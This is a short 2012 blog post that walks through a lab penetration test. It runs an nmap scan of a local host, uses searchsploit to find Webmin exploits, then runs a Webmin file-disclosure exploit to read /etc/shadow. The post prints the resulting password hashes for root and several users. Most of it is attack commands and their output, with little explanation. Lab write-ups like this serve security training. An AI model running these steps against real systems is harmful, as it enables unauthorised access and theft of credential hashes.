Monday 30 January 2012

Privilege Escalation

this is step by step to privilege escalation

first,  information gathering using nmap :
host server 192.168.0.21


root@bt:~# nmap -v -A 192.168.0.21

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-31 06:23 BNT

NSE: Loaded 87 scripts for scanning.

NSE: Script Pre-scanning.

Initiating ARP Ping Scan at 06:23

Scanning 192.168.0.21 [1 port]

Completed ARP Ping Scan at 06:23, 0.08s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 06:23

Completed Parallel DNS resolution of 1 host. at 06:23, 13.00s elapsed

Initiating SYN Stealth Scan at 06:23

Scanning 192.168.0.21 [1000 ports]

Discovered open port 445/tcp on 192.168.0.21

Discovered open port 139/tcp on 192.168.0.21

Discovered open port 22/tcp on 192.168.0.21

Discovered open port 80/tcp on 192.168.0.21

Discovered open port 10000/tcp on 192.168.0.21

Completed SYN Stealth Scan at 06:23, 0.12s elapsed (1000 total ports)

Initiating Service scan at 06:23

Scanning 5 services on 192.168.0.21

Completed Service scan at 06:23, 11.03s elapsed (5 services on 1 host)

Initiating OS detection (try #1) against 192.168.0.21

NSE: Script scanning 192.168.0.21.

Initiating NSE at 06:23

Completed NSE at 06:23, 1.01s elapsed

Nmap scan report for 192.168.0.21

Host is up (0.00060s latency).

Not shown: 995 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)

| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)

|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)

80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)

|_http-methods: No Allow or Public header in OPTIONS response (status code 200)

|_http-title: Site doesn't have a title (text/html).

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)

445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)

10000/tcp open http MiniServ 0.01 (Webmin httpd)

|_http-methods: No Allow or Public header in OPTIONS response (status code 200)

|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).

|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285

MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)

Device type: general purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:kernel:2.6.22

OS details: Linux 2.6.22 (embedded, ARM)

Uptime guess: 0.061 days (since Tue Jan 31 04:56:12 2012)

then vulnerability assesment using nessus, result from nessus as below :

 

  

to view detail report, click here
then choose port 10000 which service webmin run to exploit using exploit db

root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
Description Path

--------------------------------------------------------------------------- -------------------------

Webmin BruteForce and Command Execution Exploit /multiple/remote/705.pl

Webmin Web Brute Force v1.5 (cgi-version) /multiple/remote/745.cgi

Webmin BruteForce + Command Execution v1.5 /multiple/remote/746.pl

Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit /multiple/remote/1997.php

Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl

phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt

phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt

phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt

phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt

phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt

root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl

Usage: platforms/multiple/remote/2017.pl <url> <port> <filename> <target>

TARGETS are

0 - > HTTP

1 - > HTTPS

Define full path with file name

Example: ./webmin.pl blah.com 10000 /etc/passwd


open etc/shadow to knowing user of system

root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl 192.168.0.21 10000 /etc/shadow 0

WEBMIN EXPLOIT !!!!! coded by UmZ!

Comments and Suggestions are welcome at umz32.dll [at] gmail.com

Vulnerability disclose at securitydot.net

I am just coding it in perl 'cuz I hate PHP!

Attacking 192.168.0.21 on port 10000!

FILENAME: /etc/shadow

FILE CONTENT STARTED

-----------------------------------

root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::

daemon:*:14040:0:99999:7:::

bin:*:14040:0:99999:7:::

sys:*:14040:0:99999:7:::

sync:*:14040:0:99999:7:::

games:*:14040:0:99999:7:::

man:*:14040:0:99999:7:::

lp:*:14040:0:99999:7:::

mail:*:14040:0:99999:7:::

news:*:14040:0:99999:7:::

uucp:*:14040:0:99999:7:::

proxy:*:14040:0:99999:7:::

www-data:*:14040:0:99999:7:::

backup:*:14040:0:99999:7:::

list:*:14040:0:99999:7:::

irc:*:14040:0:99999:7:::

gnats:*:14040:0:99999:7:::

nobody:*:14040:0:99999:7:::

dhcp:!:14040:0:99999:7:::

syslog:!:14040:0:99999:7:::

klog:!:14040:0:99999:7:::

mysql:!:14040:0:99999:7:::

sshd:!:14040:0:99999:7:::

vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::

obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::

osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::

yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::






















Posted by at 11:00

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)